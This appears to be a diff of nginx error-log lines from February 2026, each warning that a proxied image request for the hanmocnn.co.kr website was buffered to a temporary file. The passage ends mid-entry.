-2026/02/18 21:59:30 [warn] 976#976: *102635 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/84/0000019842 while reading upstream, client: 121.139.173.148, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 21:59:31 [warn] 974#974: *102643 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/84/0000019843 while reading upstream, client: 121.139.173.148, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 21:59:31 [warn] 974#974: *102643 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/84/0000019844 while reading upstream, client: 121.139.173.148, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 21:59:31 [warn] 974#974: *102643 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/84/0000019845 while reading upstream, client: 121.139.173.148, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 21:59:31 [warn] 974#974: *102643 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/84/0000019846 while reading upstream, client: 121.139.173.148, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 22:02:02 [warn] 974#974: *102656 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/84/0000019847 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 22:02:02 [warn] 974#974: *102656 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/84/0000019848 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 22:02:02 [warn] 974#974: *102656 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/84/0000019849 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 22:02:02 [warn] 974#974: *102656 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/85/0000019850 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 22:02:02 [warn] 974#974: *102656 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/85/0000019851 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 22:02:02 [warn] 974#974: *102656 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/85/0000019852 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/instrument.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/instrument.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 22:02:02 [warn] 974#974: *102656 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/85/0000019853 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 23:58:37 [warn] 985#985: *104319 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/62/0000020622 while reading upstream, client: 74.7.229.221, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 23:58:40 [warn] 986#986: *104324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/62/0000020623 while reading upstream, client: 74.7.229.19, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 23:58:49 [warn] 987#987: *104330 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/62/0000020624 while reading upstream, client: 74.7.243.44, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 23:58:53 [warn] 990#990: *104334 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/62/0000020625 while reading upstream, client: 74.7.242.172, server: hanmocnn.co.kr, request: "GET /assets/images/instrument.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/instrument.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 23:58:55 [warn] 990#990: *104334 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/62/0000020626 while reading upstream, client: 74.7.242.172, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 23:59:00 [warn] 989#989: *104327 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/62/0000020627 while reading upstream, client: 74.7.228.139, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 00:38:57 [warn] 985#985: *104360 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/62/0000020628 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 00:38:57 [warn] 985#985: *104360 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/62/0000020629 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 00:38:57 [warn] 985#985: *104360 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/63/0000020630 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 00:38:58 [warn] 985#985: *104360 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/63/0000020631 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 00:40:01 [warn] 985#985: *104360 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/63/0000020632 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 00:42:47 [warn] 985#985: *104420 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/63/0000020633 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 00:42:47 [warn] 985#985: *104420 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/63/0000020634 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 00:42:47 [warn] 985#985: *104420 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/63/0000020635 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 00:43:45 [warn] 985#985: *104420 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/63/0000020636 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 00:43:45 [warn] 985#985: *104420 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/63/0000020637 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 00:45:36 [warn] 988#988: *104477 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/63/0000020638 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 00:45:36 [warn] 988#988: *104477 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/63/0000020639 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 00:46:33 [warn] 988#988: *104477 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/64/0000020640 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 01:24:43 [warn] 989#989: *106071 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/38/0000021384 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 01:24:43 [warn] 989#989: *106071 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/38/0000021385 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 01:37:47 [warn] 989#989: *107628 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/12/0000022129 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 01:37:47 [warn] 989#989: *107628 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/13/0000022130 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 01:37:47 [warn] 989#989: *107628 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/13/0000022131 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 01:37:48 [warn] 989#989: *107628 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/13/0000022132 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 01:45:28 [warn] 989#989: *107645 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/13/0000022133 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 01:45:28 [warn] 989#989: *107645 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/13/0000022134 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 01:46:07 [warn] 989#989: *107645 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/13/0000022135 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 01:55:25 [warn] 989#989: *107746 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/13/0000022136 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 01:55:25 [warn] 989#989: *107746 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/13/0000022137 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 01:55:25 [warn] 989#989: *107746 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/13/0000022138 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 01:55:36 [warn] 989#989: *107746 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/13/0000022139 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 01:57:46 [warn] 989#989: *107775 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/14/0000022140 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 01:57:46 [warn] 989#989: *107775 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/14/0000022141 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 01:57:46 [warn] 989#989: *107775 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/14/0000022142 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 01:58:21 [warn] 989#989: *107775 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/14/0000022143 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 02:00:03 [warn] 987#987: *107804 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/14/0000022144 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 02:00:58 [warn] 987#987: *107804 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/14/0000022145 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 02:00:58 [warn] 987#987: *107804 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/14/0000022146 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 02:00:58 [warn] 987#987: *107804 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/14/0000022147 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 02:34:11 [warn] 987#987: *107845 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/14/0000022148 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 02:34:11 [warn] 987#987: *107845 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/14/0000022149 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 02:34:11 [warn] 987#987: *107845 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/15/0000022150 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 02:34:11 [warn] 987#987: *107845 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/15/0000022151 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 02:39:55 [warn] 987#987: *107860 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/15/0000022152 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 02:39:55 [warn] 987#987: *107860 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/15/0000022153 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 02:41:34 [warn] 987#987: *107874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/15/0000022154 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 02:44:20 [warn] 987#987: *107889 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/15/0000022155 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 02:44:20 [warn] 987#987: *107889 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/15/0000022156 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 02:44:20 [warn] 987#987: *107889 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/15/0000022157 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 02:46:16 [warn] 987#987: *107904 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/15/0000022158 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 02:46:16 [warn] 987#987: *107904 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/15/0000022159 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 02:46:16 [warn] 987#987: *107904 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/16/0000022160 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 02:47:48 [warn] 987#987: *107918 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/16/0000022161 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 02:47:48 [warn] 987#987: *107918 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/16/0000022162 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 02:57:14 [warn] 991#991: *107953 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/16/0000022163 while reading upstream, client: 222.239.104.26, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/" +2026/02/19 02:57:14 [warn] 991#991: *107956 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/16/0000022164 while reading upstream, client: 222.239.104.26, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/" +2026/02/19 02:57:14 [warn] 992#992: *107962 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/16/0000022165 while reading upstream, client: 222.239.104.26, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/" +2026/02/19 02:57:14 [warn] 990#990: *107961 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/16/0000022166 while reading upstream, client: 222.239.104.26, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/1.1", upstream: 